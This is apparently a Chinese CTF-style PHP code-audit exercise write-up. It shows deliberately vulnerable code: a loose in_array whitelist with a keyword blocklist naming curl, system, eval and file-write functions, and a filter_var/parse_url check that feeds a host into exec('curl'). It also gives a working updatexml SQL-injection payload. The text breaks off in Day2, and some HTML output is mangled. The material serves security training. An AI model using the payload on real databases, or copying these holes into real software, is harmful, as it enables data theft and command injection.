酉酉囧
酉酉囧

PHP代码审计Day1-4练习题

文章目录

  • Day1 in_array函数缺陷
    • 解题
      • payload
  • Day2 - filter_var函数缺陷
    • 解题
      • payload
  • Day3 实例化任意对象漏洞
    • 解题
      • payload1

来自先知社区-红日安全-

Day1 in_array函数缺陷

链接

//1.php

include 'config.php';
$conn = new mysqli($servername, $username, $password, $dbname);
if ($conn->connect_error) {
    die("连接失败: ");
}

$sql = "SELECT COUNT(*) FROM users";
$whitelist = array();
$result = $conn->query($sql);
if($result->num_rows > 0){
    $row = $result->fetch_assoc();
    $whitelist = range(1, $row['COUNT(*)']);
}

$id = stop_hack($_GET['id']);
$sql = "SELECT * FROM users WHERE id=$id";

if (!in_array($id, $whitelist)) {
    die("id $id is not in whitelist.");
}

$result = $conn->query($sql);
if($result->num_rows > 0){
    $row = $result->fetch_assoc();
    echo "
";foreach($rowas$key=>$value){echo"
";echo"
";}echo"

          
         
$key

         
$value

    
     
";
}
else{
    die($conn->error);
}

?>

//config.php
  
$servername = "localhost";
$username = "fire";
$password = "fire";
$dbname = "day1";

function stop_hack($value){
    $pattern = "insert|delete|or|concat|concat_ws|group_concat|join|floor|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile|dumpfile|sub|hex|file_put_contents|fwrite|curl|system|eval";
    $back_list = explode("|",$pattern);
    foreach($back_list as $hack){
        if(preg_match("/$hack/i", $value))
            die("$hack detected!");
    }
    return $value;
}
?>

解题

  • in_arry的绕过,没有使用强匹配,所以可以绕过
  • stop_hack()过滤了常见的字符串拼接函数,一样可以用updatexml注入

payload

?id=4 and (select updatexml(1,make_set(3,'~',(select flag from flag)),1))

Day2 - filter_var函数缺陷

 
$url = $_GET['url'];
if(isset($url) && filter_var($url, FILTER_VALIDATE_URL)){
    $site_info = parse_url($url);
    if(preg_match('/sec-redclub.com$/',$site_info['host'])){
        exec('curl "'.$site_info['host'].'"', $result);
        echo "
You have curl {$site_info['host']} successfully!